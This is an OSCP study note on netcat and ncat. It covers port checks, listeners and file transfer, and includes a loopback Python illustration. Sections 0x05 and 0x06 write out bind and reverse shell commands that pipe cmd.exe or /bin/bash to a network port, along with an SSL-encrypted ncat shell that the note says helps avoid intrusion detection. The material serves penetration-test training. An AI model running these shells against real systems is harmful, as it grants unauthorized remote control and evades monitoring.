OSCP Note - Common uses of Netcat (nc) and Ncat
0x00 TL;DR
This article records common ways to use nc:
- Determine whether a target port is open
- Connecting to a TCP/UDP port
- Listening on a TCP/UDP port
- Transferring files with Netcat
- Remote administration with Netcat
- Ncat: a more secure nc
0x01 Determine if the target port is open
-v is verbose, -z scans without sending any data.
- Port open:
[ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 22
- Port closed:
[ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 23
0x02 Connecting to a TCP/UDP Port
Useful for:
- checking whether a port is open or closed
- reading a service banner
- connecting to a network service manually
Example (-n skips DNS resolution, -v is verbose):
[ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 22
0x03 Listening on a TCP/UDP Port
Useful for:
- network debugging of client applications
- otherwise receiving a TCP/UDP network connection
Server side, listen on TCP port 4444:
[ec2-user@ip-10-0-0-64 ~]$ nc -nvlp 4444
With netstat you can see that TCP port 4444 is open (bound to 0.0.0.0, i.e. all interfaces):
[ec2-user@ip-10-0-0-64 ~]$ sudo netstat -nltp | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 7427/nc
tcp6 0 0 :::4444 :::* LISTEN 7427/nc
[ec2-user@ip-10-0-0-64 ~]$
The client side can connect to this TCP port and chat with the server side:
[ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 4444
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.64:4444.
aaaa
aaaaaaaaaaaaaaaaa
0x04 Transferring Files with Netcat
Note: check the Windows Firewall configuration, which may block the listening port.
Both text and binary files are supported. nc performs no integrity check of its own, so compare the file hashes on both ends after the transfer.
Server side (target machine), receiving into wget.exe:
D:\netcat-win32-1.12>nc64.exe -nlvp 4444 > wget.exe
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.xxx] 59980
Client side, sending wget.exe:
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 < wget.exe
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Ncat: 308736 bytes sent, 0 bytes received in 0.62 seconds.
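As an added illustration (not part of the original note), the Python below reproduces with raw sockets what sections 0x01, 0x03 and 0x04 do with nc: a connect-only probe like nc -vz, a loopback listener like nc -nvlp, and a one-shot file transfer followed by the SHA-256 comparison that nc itself never performs. All addresses are loopback and the transferred payload is a constructed byte string, not the page's wget.exe.

```python
import hashlib
import socket
import threading
def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    # What `nc -vz host port` does: one TCP connect, closed as soon as it succeeds.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable
        return False

def local_listener() -> socket.socket:
    # Bound like `nc -nvlp`, but loopback only and on a kernel-chosen free port (port 0).
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    return listener

def port_check_demo() -> tuple:
    # The open/closed pair from section 0x01, probed against a listener we control.
    listener = local_listener()
    port = listener.getsockname()[1]
    while_open = port_is_open("127.0.0.1", port)
    listener.close()
    return while_open, port_is_open("127.0.0.1", port)  # (True, False)

def receive_file(listener: socket.socket) -> bytes:
    # Receiver side of `nc -nlvp 4444 > file`: accept one peer, read until it closes (EOF).
    conn, _ = listener.accept()
    with conn:
        return b"".join(iter(lambda: conn.recv(65536), b""))

def send_file(host: str, port: int, payload: bytes) -> None:
    # Sender side of `nc -nv host 4444 < file`: write everything, then signal EOF.
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)

def transfer_and_verify(payload: bytes) -> dict:
    # Loopback transfer plus a SHA-256 comparison, which nc itself never performs.
    listener = local_listener()
    port = listener.getsockname()[1]
    box = {}
    worker = threading.Thread(target=lambda: box.update(received=receive_file(listener)))
    worker.start()
    send_file("127.0.0.1", port, payload)
    worker.join()
    listener.close()
    return {"bytes_sent": len(payload), "bytes_received": len(box["received"]),
            "sha256_match": hashlib.sha256(payload).digest() == hashlib.sha256(box["received"]).digest()}
```

Note that a stray connection (for example a port probe) to a one-shot nc listener is accepted as the transfer peer, so the probe in port_check_demo is deliberately run against a listener that never calls accept.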
0x05 Remote Administration with Netcat
Netcat can take an executable file and redirect its input (stdin), output (stdout), and error messages (stderr) to a TCP/UDP port rather than the default console.
nc Bind Shell
Server side (Windows):
D:\netcat-win32-1.12>nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 60420
On Linux the equivalent bind shell command is:
nc -nlvp 4444 -e /bin/bash
Client side:
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。
D:\netcat-win32-1.12>whoami
whoami
ec2amaz-okar8bt\administrator
D:\netcat-win32-1.12>
nc Reverse Shell
Server side (listener):
D:\netcat-win32-1.12>nc -nlvp 4444
listening on [any] 4444 ...
Client side:
[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 -e /bin/bash
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Then you can execute commands in this reverse shell, like this:
D:\netcat-win32-1.12>nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 40908
id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)
0x06 Ncat: a more secure nc
- Encrypting the bind or reverse shell (--ssl) will aid the penetration tester in avoiding intrusion detection systems.
- Access control (--allow) keeps the penetrated machine from being exposed to unwanted IP addresses.
Server side:
[ec2-user@ip-10-0-0-64 temp]$ ncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --ssl
Client side:
D:\NcatPortable-master\NcatPortable-master>ncat -v 52.80.67.xxx 4444 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: SSL connection to 52.80.67.xxx:4444.
Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3
id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)
Then you can execute commands in this bind shell. Note that --ssl on its own does not verify the peer certificate: the SHA-1 fingerprint printed by the client is the only identity check, so compare it with the fingerprint the verbose listener reports.
0x07 Command summary
nc -vz 10.0.0.64 22